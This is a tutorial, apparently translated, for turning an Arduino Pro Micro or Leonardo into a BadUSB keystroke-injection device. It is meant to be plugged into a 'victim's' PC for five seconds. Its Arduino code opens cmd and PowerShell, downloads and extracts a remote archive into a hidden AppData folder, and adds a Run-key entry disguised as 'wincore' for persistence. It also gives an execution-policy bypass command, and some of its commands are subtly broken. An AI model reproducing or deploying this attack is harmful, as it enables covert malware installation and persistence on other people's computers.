Homemade BadUSB on Arduino Pro Micro or Leonardo

Introduction

Not so long ago, a movie about Spiderman appeared in our cinemas. The protagonist of the film using a device that looks like a flash drive, was able to hack the system and gain control over the beam, transferring between measurements. The Arduino Leonardo and Arduino Pro Micro (and almost all microcontrollers on a 32u4 chip) can be perceived by the system as input devices. Therefore, such a device is quite realistic to make, and it will cost you only $ 3. All that is needed for hacking is to go to the victim's computer, insert a “flash drive”, wait 5 seconds, pull out and leave as if nothing had happened.

Disclaimer

This article is created solely for educational purposes. I do not distribute malware or promote it. Only you are responsible for the illegal use of such devices. Use for health, but only for peaceful purposes. When publishing a project created using this material, please indicate the link to this post or my profile.

The idea of ​​the project

Let's create the simplest BadUSB device on the Arduino Pro Micro or Leonardo, which when connected to a computer will be defined as a keyboard and enter commands at high speed. In this example I will make a program that:

1. Creates a folder in the user directory AppData
2. Downloads archive into it with the necessary files from the Internet.
3. Extracts files in the downloaded archive
4. Register the required file to autoload
5. Hides the folder and files in it and sweeps
')

Pre zero stage

Open the Arduino IDE and in the Tools tab in the board selection, put the Arduino Leonardo. Do not be surprised if Pro Micro is not listed as this microcontroller will be perceived by the system as Leonardo. Now you can start programming our "good".

We write the backbone of the code

Connect the <Keyboard.h> library to connect the controller as a keyboard to the victim’s computer. In the function Void Setup, we write the standard connection code of the microcontroller as a keyboard. We don’t need a Void Loop, but compile the sketch without it just won't work, so we’ll leave this function empty. As a result, we get the following skeleton:

#include <Keyboard.h> void setup(){ Keyboard.begin(); delay(2000);} void loop(){} 

Run Win + R

Let's write a function to open the Run window using the Win + R keyboard shortcut. We’ll need this function three times. Everything is clear here. Hold Win and press R:

 void winPlusR() { Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(45); Keyboard.releaseAll(); delay(100); } 

Create a folder

Now we almost do not need the knowledge of C ++ as the command input code is constantly repeated. Now the main thing - knowledge of the command line Windows (cmd). We think over the algorithm: launch the command line, go to the user's AppData directory, create a folder there and close the cmd window. Then everything is simple - we give our microcontroller instructions on how to do it:

 void createFolder(){ winPlusR(); //    Keyboard.println("cmd"); Keyboard.write(KEY_RETURN); delay(500); //      Keyboard.println("cd C:/Users/%USERNAME%/AppData"); Keyboard.write(KEY_RETURN); delay(100); //   mycat Keyboard.println("mkdir mycat"); Keyboard.write(KEY_RETURN); delay(100); //   Keyboard.println("exit"); Keyboard.write(KEY_RETURN); delay(200); } 

Download the archive

Downloading the archive with files turned out to be much more complicated than I thought. The fact is that in the Windows command line there is no utility for downloading from the Internet. Immediately I remembered the wget utility in Debian, but we only have access to the command line without the ability to install additional utilities. Then I had to turn to PowerShell:

 void getFiles(){ winPlusR(); //  powershell Keyboard.println("powershell"); Keyboard.write(KEY_RETURN); delay(100); //    mycat Keyboard.println("cd C:/Users/%USERNAME%/AppData/mycat"); Keyboard.write(KEY_RETURN); delay(100); //   Keyboard.println("$download_url = 'http://google.by'"); Keyboard.write(KEY_RETURN); delay(100); //    Keyboard.println("$local_path = 'C:/Downloads/file.zip'"); Keyboard.write(KEY_RETURN); delay(100); //    Keyboard.println("$WebClient = New-Object System.Net.WebClient"); Keyboard.write(KEY_RETURN); delay(500); //   Keyboard.println("$WebClient.DownloadFile($download_url, $local_path)"); Keyboard.write(KEY_RETURN); delay(1250); //   Keyboard.println("Expand-Archive $file.zip"); Keyboard.write(KEY_RETURN); delay(750); //   Keyboard.println("exit"); Keyboard.write(KEY_RETURN); delay(200); } 

Many problems

Initially, I planned to do everything differently - add the PowerShell script to the autoload, which would download and unpack the archive on the next boot without any time limit. But on most systems in the Windows family, PowerShell has a default set of maximum security policies that prohibit running ps1 scripts. You can disable this restriction with the following command:

 powershell -Command Set-ExecutionPolicy RemoteSigned 

But the bad luck is that you need administrator rights to run this command. I had to download and unpack on the go. But if you have access to the "admin", then you can safely redo the program under my first idea. I hope the reader will figure out how to write the code on his own.

But the trouble did not end there. The fact is that the command for unpacking the archive does not work in older versions of Windows. Therefore, if you are dealing with ancient versions of Windows, then instead of downloading the tool, contact a third-party archiver, for example 7-Zip:

 set-alias sz "$env:ProgramFiles\7-Zip\7z.exe" sz x -r C:/Users/%USERNAME%/AppData/mycat/file.zip 

Customize files

The hardest part is over. We return to the usual command line, set the startup file to autoload and hide the folder and files in it by changing the attributes:

 void setUpFiles(){ winPlusR(); //    Keyboard.println("cmd"); Keyboard.write(KEY_RETURN); delay(100); //     Keyboard.println("cd C:/Users/%USERNAME%/AppData"); Keyboard.write(KEY_RETURN); delay(100); //      Keyboard.println("attrib +h mycat"); Keyboard.write(KEY_RETURN); delay(100); //     Keyboard.println("attrib +h mycat/"); Keyboard.write(KEY_RETURN); delay(100); //    Keyboard.println("reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v 'wincore' /d 'C:/Users/%USERNAME%/AppData/mycat/start.bat'"); Keyboard.write(KEY_RETURN); delay(250); //     cmd Keyboard.println("cls && exit"); Keyboard.write(KEY_RETURN); //   ""   } 

From pieces into one

Change the Void Setup to run the functions we wrote in turn:

 void setup() { Keyboard.begin(); delay(2000); createFolder(); getFiles(); setUpFiles(); } 

Conclusion

We wrote the simplest sketch for our “flash drive” on the Arduino IDE. You can connect it to the victim's PC using a standard miniUSB to USB adapter (preferably without a cable). Use, but not for evil to others.